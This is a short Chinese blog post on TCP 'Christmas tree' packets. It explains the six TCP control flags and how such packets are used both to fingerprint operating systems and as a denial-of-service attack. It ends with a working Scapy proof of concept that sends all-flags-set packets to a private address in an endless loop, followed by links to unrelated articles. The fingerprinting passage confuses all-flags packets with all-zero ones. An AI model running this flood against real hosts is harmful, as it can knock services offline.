【网络协议测试】畸形数据包——圣诞树攻击(DOS攻击)

简介

TCP所有标志位被设置为1的数据包被称为圣诞树数据包(XMas Tree packet),之所以叫这个名是因为这些标志位就像圣诞树上灯一样全部被点亮。

标志位介绍

TCP报文格式:

控制标志(Control Bits)共6个bit位,分别为URG、ACK、PSH、RST、SYN、FIN。

标志位 说明
URG 高优先级数据包
ACK 确认连接
PSH 要求对方数据尽快达到应用层
RST 重置或拒绝连接
SYN 连接请求(SYN=1)或连接接受报文(SYN=1,ACK=1)
FIN 数据发送完毕,请求释放连接

当你发送了这样一个数据包之后,不同的操作系统对其的响应方式是不一样的,因此可以作为目标系统探测的一种方式(6个标志全部为0 ,如果端口是关闭的,Windows机器将应答一个RST | ACK消息,而对于一个开放端口的Linux和UNIX机器则不会应答。)。

此外,通常来说,目标系统需要对这个数据包进行更复杂的处理(毕竟点的灯比较多),相比一般的包处理耗费的资源会更多,因此也可以用作DOS攻击。

附Poc:

python 复制代码
from scapy.all import *
pkt_tree=IP(dst='192.168.1.2')/TCP(dport=8081,flags=0x03f)
while True:
	send(pkt_tree)
相关推荐
冰暮流星13 小时前
flask之http请求方法
网络·网络协议·http
K成长日志14 小时前
BLE协议之设备地址
网络·物联网·网络协议·嵌入式·蓝牙·ble
广州市顺风搬家服务有限公司14 小时前
实验室搬迁科普专业流程防护标准与合规核心要点
网络·其他·安全
liulilittle14 小时前
KCC 边界缺陷深度分析:六问题根源与解决方案
网络·网络协议·tcp/ip·计算机网络·信息与通信·ip·通信
BS_Li15 小时前
【Linux网络编程】NAT、代理服务、内网穿透
linux·网络·智能路由器
Thomas.Chan16 小时前
数据中心动环监控系统架构详解
运维·网络·计算机网络·其他·系统架构·数据中心
2401_8685347816 小时前
网络规划设计师学习笔记
python·计算机网络
浩瀚之水_csdn17 小时前
Python 3 网络编程详解:从原理到实战
开发语言·网络·python
犹豫的哑铃17 小时前
WebSocket 协议
网络·websocket·网络协议
apcipot_rain17 小时前
计科八股2026705——正态分布、独立与不相关、范数、列表元组集合、链表队列、sort函数、URL执行
python·计算机网络·概率论